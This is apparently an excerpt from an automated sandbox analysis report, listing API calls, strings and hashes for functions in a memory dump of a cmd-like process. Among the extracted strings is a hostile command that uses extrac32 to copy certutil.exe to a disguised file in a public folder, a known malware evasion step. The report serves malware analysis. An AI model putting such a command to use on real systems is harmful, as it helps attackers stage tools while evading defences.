                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction ID: 63000e758ed284127b4c02d36b41793333cbdfab48e23bb45371ff7b1af3f81f
                                                                                          • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                                                                          • Instruction Fuzzy Hash: FF41CF72E0B253E6FBA08B15E55437976E0BF55751F849035CE8CC23A2DF3CA8A1A700
                                                                                          Function 00007FF6A0E9BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                                          • String ID: %04X-%04X$:
                                                                                          • API String ID: 930873262-1938371929
                                                                                          • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                          • Instruction ID: 57f97cd7c20d12d1be780781af9204cd114e99c9ad880aeff7a729c657da3a33
                                                                                          • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                                          • Instruction Fuzzy Hash: 3E41D031A0EA83E2EB649B20E5502BAB3A0FF88741F504536EA5E837D5DF3CE544E710
                                                                                          Function 00007FF6A0E836EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                          • API String ID: 3249344982-2616576482
                                                                                          • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction ID: 6eadcb6025df01fe4c7fa27d6582fe5b37bf05511ad17e51780853cc84aa3839
                                                                                          • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                          • Instruction Fuzzy Hash: 47417172619B8296E3108F21A84436ABAA4FB8DBD5F448235EA4D87794CF7DD4199B00
                                                                                          Function 00007FF6A0E86A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A73
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86A91
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AB0
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86AE3
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E868A3,?,?,?,?,?,?,?,00000000,?,00007FF6A0E863F3), ref: 00007FF6A0E86B01
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit
                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                          • API String ID: 2770779731-632268628
                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction ID: b03abbd8d4413db24ecdd0d70715ae4dda8eedd753cfafcf4aadb48eb9535333
                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                          • Instruction Fuzzy Hash: 3931F932A0AA57A5EB549F51E45027977F0FB89F89F558135DA4E83394EF3CE408E310
                                                                                          Function 00007FF6A0E9D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                          • String ID:
                                                                                          • API String ID: 3192234081-0
                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                          • Instruction ID: 4495a102ae481a27643e5c004b8683a8358f76e9239c391bd8b3eb2c2d628ff6
                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                          • Instruction Fuzzy Hash: 69319131709693ABE710AF31E44467DFBA0FB89B91F449134EE9A877A6CE3CD4019B00
                                                                                          Function 00007FF6A0E81630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81673
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8168D
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81757
                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8176E
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E81788
                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6A0E814D6,?,?,?,00007FF6A0E7AA22,?,?,?,00007FF6A0E7847E), ref: 00007FF6A0E8179C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                          • String ID:
                                                                                          • API String ID: 3586862581-0
                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction ID: 33246000a8bbe347cd3cb99fae34ea1e1714bfbfd4575d5a17ad16b855c513bc
                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                          • Instruction Fuzzy Hash: BF917C72A0AB43A2EA158B15E440379B7E4FB49B90F598136DE4D837A0DF3CE449E340
                                                                                          Function 00007FF6A0E886F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                          • String ID:
                                                                                          • API String ID: 1313749407-0
                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction ID: a159577ad3e3f8a6b951397a439d883a06b6326ea77635c09b315f45b4eee1e7
                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                          • Instruction Fuzzy Hash: CC51C632E0B6C362FA549B26A904279A6A5FF49B90F685235DD1EC77D1DF3CE844A300
                                                                                          Function 00007FF6A0E9EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                          • String ID:
                                                                                          • API String ID: 920682188-0
                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                          • Instruction ID: 1101fc48485642febb401ed2702c12d48870c5e852e16df3a434bcfed0f08e74
                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                          • Instruction Fuzzy Hash: 1C512832706BC69AEB25DF24D8542E8B7A1FB88B85F048135DA4E87764EF3CD649D700
                                                                                          Function 00007FF6A0E7DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF6A0E7E00B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                          • API String ID: 777023205-3344945345
                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                          • Instruction ID: d404c9a90c688e21cb10f23051cfabf00d508866b7b7ad2e358dfe5a6fe026e9
                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                          • Instruction Fuzzy Hash: 94514A32D0FB43E5FB558B15A890279B7A0FF8A794F548536D90EC23A2DF7CA440A700
                                                                                          Function 00007FF6A0E7F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1BA
                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F1E7
                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F1FF
                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                          • String ID: )$=,;
                                                                                          • API String ID: 1959970872-2167043656
                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction ID: 0503932f051479bb815cb9a7ece32915a1e1ab91501cf47de9e6529ac61de533
                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                          • Instruction Fuzzy Hash: 2F41BB75E0B253F6FBA48B10E9483793AE0BF51741F949036C98DC23A2CF3CA860B601
                                                                                          Function 00007FF6A0E991B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 3625580822-2781220306
                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction ID: a79771e769768a57ffc97fdaae4fbe133e6044ca0ce2d491a3eb4a948bb38108
                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                          • Instruction Fuzzy Hash: C931D031A0A747B2EA149B56B5001BAB2A5BF49BD4F544130DE1D977E2EF3CE885D300
                                                                                          Function 00007FF6A0E81FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memsetwcsspn
                                                                                          • String ID:
                                                                                          • API String ID: 3809306610-0
                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                          • Instruction ID: 3f8feef0b43fb4f5e1626ea371939a2987a39011caa9c03b4db26c4ad407e33d
                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                          • Instruction Fuzzy Hash: EBB1C472E0AB47A2EB50CF15E45027977A0FB59B80F958035DA4E877A1DF7DE849E300
                                                                                          Function 00007FF6A0E98C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                          • String ID:
                                                                                          • API String ID: 3841054028-0
                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                          • Instruction ID: 3ff3ec679e3e0b6169ced7e2c6d54c930e011ae67546f181988a6eea8d096a05
                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                          • Instruction Fuzzy Hash: 77510636A0A693A1EB248B15DA001B9F6A5FF68791B558232EE5DC23E4DF3CE441E310
                                                                                          Function 00007FF6A0E75984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93687
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936A6
                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E936EB
                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF6A0E93703
                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6A0E7260D), ref: 00007FF6A0E93722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$Write_get_osfhandle$Mode
                                                                                          • String ID:
                                                                                          • API String ID: 1066134489-0
                                                                                          • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction ID: 73c792fde4408378a025d8589b62d9eb947dd8efffbc27026893511012d40255
                                                                                          • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                          • Instruction Fuzzy Hash: 68519E76B0A643B6EA249F31A80457AE6A1FB88BD1F084535DE1A83791DF3CE440EB00
                                                                                          Function 00007FF6A0E789C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
